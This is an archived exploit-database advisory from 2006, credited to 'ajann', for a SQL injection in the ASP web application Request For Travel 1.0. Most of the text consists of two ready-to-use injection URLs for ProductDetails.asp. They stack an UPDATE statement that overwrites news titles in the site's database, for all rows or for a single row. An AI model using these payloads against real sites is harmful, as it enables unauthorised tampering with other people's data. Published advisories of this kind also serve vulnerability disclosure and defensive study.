Request For Travel 1.0 - 'product' SQL Injection

EDB-ID:

2908


Author:

ajann

Type:

webapps


Platform:

ASP

Date:

2006-12-09


*************************************************************************************
# Title   :  Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :  $8,000

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//ProductDetails.asp=[SQL]

Example:
-> All News Title Changed to = "kro"

//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--

-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]